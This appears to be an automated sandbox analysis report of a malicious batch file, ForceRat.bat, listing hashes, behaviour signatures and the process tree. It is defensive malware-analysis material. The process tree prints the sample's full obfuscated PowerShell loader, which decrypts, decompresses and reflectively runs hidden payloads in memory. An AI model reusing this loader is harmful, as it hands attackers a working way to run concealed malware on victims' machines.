Analysis
-
max time kernel
16s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
08/03/2025, 22:15
Static task
static1
Behavioral task
behavioral1
Sample
ForceRat.bat
Resource
win7-20240729-en
4 signatures
150 seconds
General
-
Target
ForceRat.bat
-
Size
62KB
-
MD5
9ff22475afa34e18ac87c1ecf2d2453d
-
SHA1
2ccceed810073dddf873c03507c0d83d1054889c
-
SHA256
34dbb840c1e4fcda91badbe0f86af62a27ec6f36feb0c804e14494d9b2d20c83
-
SHA512
43d7c2539ec8a4219fd13351a39b3a2b2fc4755203cb7fd90698d5b10fc7cc86a5adee890c0a1ae295ec0b524eac9dbfcc9c4a1193e9229dec10069414e13ddf
-
SSDEEP
1536:OMctvfYIoxAwbvnzCRsU/inHUXgXnB5k16:OMctv2rzCm0in0wXnzA6
Score
6/10
Malware Config
Signatures
-
pid Process 2264 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2264 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2264 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2508 wrote to memory of 2264 2508 cmd.exe 31 PID 2508 wrote to memory of 2264 2508 cmd.exe 31 PID 2508 wrote to memory of 2264 2508 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ForceRat.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BBJjIPrkiMu54o7S2Kkh7ta7aoxNtRDfeHTVupEQamI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7i8nyfo4dAw7TNNjSmXtJA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dCOmI=New-Object System.IO.MemoryStream(,$param_var); $zHMRK=New-Object System.IO.MemoryStream; $kYWHz=New-Object System.IO.Compression.GZipStream($dCOmI, [IO.Compression.CompressionMode]::Decompress); $kYWHz.CopyTo($zHMRK); $kYWHz.Dispose(); $dCOmI.Dispose(); $zHMRK.Dispose(); $zHMRK.ToArray();}function execute_function($param_var,$param2_var){ $qDyOg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DFcjP=$qDyOg.EntryPoint; $DFcjP.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ForceRat.bat';$pidIT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ForceRat.bat').Split([Environment]::NewLine);foreach ($gGJcA in $pidIT) { if ($gGJcA.StartsWith(':: ')) { $qdpSs=$gGJcA.Substring(3); break; }}$payloads_var=[string[]]$qdpSs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2264
-